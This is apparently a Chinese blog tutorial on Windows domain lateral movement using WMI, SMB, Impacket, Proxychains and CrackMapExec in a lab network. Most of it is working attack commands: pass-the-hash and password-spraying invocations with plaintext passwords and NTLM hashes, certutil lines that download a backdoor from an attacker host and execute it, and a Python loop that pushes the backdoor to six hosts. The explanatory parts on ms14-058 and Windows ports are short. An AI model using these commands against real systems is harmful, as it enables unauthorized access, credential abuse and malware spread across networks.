您当前的位置:首页 > 计算机 > 安全防护

【内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

时间:10-06来源:作者:点击数:

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Plink,DCOM,Kerberos_TGS,GPO&DACL,

域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。

域信息收集-目标&用户&凭据&网络

这里webserver提权使用的是ms14-058

关于ms14-058(CVE-2014-4113)

常用提权工具

Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它

包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处

理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代

码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。

该漏洞影响所有Windows x64,包括Windows 7 和 Windows Server 2008 R2 及以下版本

区分135、137、138、139和445端口

TCP135端口

UDP137、138端口

TCP139、445端口

这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。比如2017年危害全球的永恒之蓝,就是利用的445端口

SMB:(Server Message Block) Windows协议族,用于文件共享、打印共享的服务

NBT:(NetBIOS Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NetBIOS网络互联

域横向移动-WMI-自带&命令&套件&插件

WMI是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,

并且该方法不会在目标日志系统留下痕迹。

1.wmic

内部:(系统自带命令 单执行 无回显)

win10 使用该命令会报错

‘vmic’ 不是内部或外部命令,也不是可运行的程序 或批处理文件。

在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic

只需要添加C:\Windows\System32\wbem 到环境变量——系统变量的Path变量

wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/bindtcp-2222.exe c:/beacon.exe"		#普通账号显示拒绝访问 权限不够,DC账号可用
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe c:/beacon.exe"    #经测试 不能执行后门,DC账号也不能用

2.cscript

内置:(交互式 在cs中无法反弹shell)

上传wmiexec.vbs

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345
在这里插入图片描述

3.wmiexec-impacket项目-推荐

外部:(交互式&单执行)

python3 wmiexec.py ./administrator:admin!@#45@192.168.3.32 "whoami"
python3 wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
在这里插入图片描述

下载后门:

python3 wmiexec.py ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe"
在这里插入图片描述

执行后门:

python3 wmiexec.py ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c c:/webserver4444.exe"
在这里插入图片描述

域横向移动-SMB-自带&命令&套件&插件

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

1.psexec

内部:(交互式 windows官方工具,白名单)

psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

外部:(交互式 外人开发的工具)

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

使用代理在本地运行是不行的,而且cs上不能反弹cmd窗口,能只在webserver使用管理员权限上执行。或许msf可以成功

在这里插入图片描述

插件:

cs-psexec CS插自带横向移动功能在这里插入图片描述

注意监听器的选择

在这里插入图片描述

多尝试几个用户及hash值,以及域用户、非域用户

2.smbexec-impacket -推荐

外部:(交互式)

python3 smbexec.py ./administrator:admin!@#45@192.168.3.32	#非域用户
python3 smbexec.py god/administrator:admin!@#45@192.168.3.32	#域用户
python3 smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python3 smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c god/administrator@192.168.3.32smbexec -hashes god/administrator:518b98ad4178a53695dc997aa02d455c@192.168.3.32
在这里插入图片描述

3.services - 比较麻烦 了解即可

内置:(单执行)

services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 start -name shell

域横向移动-工具-Proxychains&CrackMapExec

1、Windows+Proxifier+Python_exp

具体配置见往期内容

python 129-wmismb.py
在这里插入图片描述
import os

ips=['192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.28','192.168.3.30','192.168.3.32']

def down():
    for ip in ips:
        wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe"'%ip
        print(wmi_exec)
        os.system(wmi_exec)
        
def zx():
    for ip in ips:
        wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "c:/webserver4444.exe"'%ip
        print(wmi_exec)
        os.system(wmi_exec)
        
if __name__ == '__main__':
    down()
    zx()

2、Linux+Proxychains+CrackMapExec 推荐

CrackMapExec

Github:https://github.com/Porchetta-Industries/CrackMapExec

官方手册:https://mpgn.gitbook.io/crackmapexec/

部分案例:https://www.cdsy.xyz/computer/security/231006/cd46181.html

下载对应release,建立socks连接,设置socks代理,配置规则,调用!

Linux Proxychains使用

安装使用:https://www.cdsy.xyz/computer/soft/net/231006/cd46180.html

代理配置:Proxychains.conf 代理调用:Proxychains 命令

这里我直接使用kali自带的CrackMapExec

proxychains crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45'
在这里插入图片描述
proxychains crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth
在这里插入图片描述
proxychains crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe' --local-auth   #本地用户全自动上线

这里正常上线了两台(Mary-PC,sqlserver),重新获取凭证与明文密码,在Mary-PC中获取到Boss账号以及hash值,使用hash值做下一步操作

在这里插入图片描述
proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 'ccef208c6485269c20db2cad21734fe7' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe'
在这里插入图片描述

真实情况下肯定是不清楚那些凭证以及密码可以使用,所以放入文件中,两两组合

proxychains crackmapexec smb 192.168.3.21-32 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe' --local-auth

用户名使用 net user /domain 获取

密码使用明文 或者HASH(-H) 但是这里主机已经上线的差不多了,不在做演示

最后一台fileadmin

使用插件也行

使用crackmapexec 也行

在这里插入图片描述

但是没上线(可能是靶机的问题)

效果图:

在这里插入图片描述
常规安装命令使用参考

密码喷射域登录:

proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!@#45’

密码喷射本地登录:

proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!@#45’ --local-auth

密码喷射本地登录命令执行:

proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!@#45’ -x ‘whoami’ --local-auth

密码喷射本地登录命令执行上线:

proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!@#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/webserver4444.exe & c:/webserver4444.exe’ --local-auth

密码喷射域登录命令执行上线:

proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!@#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe’

密码喷射本地&域登录命令执行全自动上线:

proxychains python cme smb 192.168.3.21-32 -u user.txt -p pass.txt -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe’

proxychains python cme smb 192.168.3.21-32 -u administrator -p pass.txt -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe’ --local-auth

方便获取更多学习、工作、生活信息请关注本站微信公众号城东书院 微信服务号城东书院 微信订阅号
推荐内容
相关内容
栏目更新
栏目热门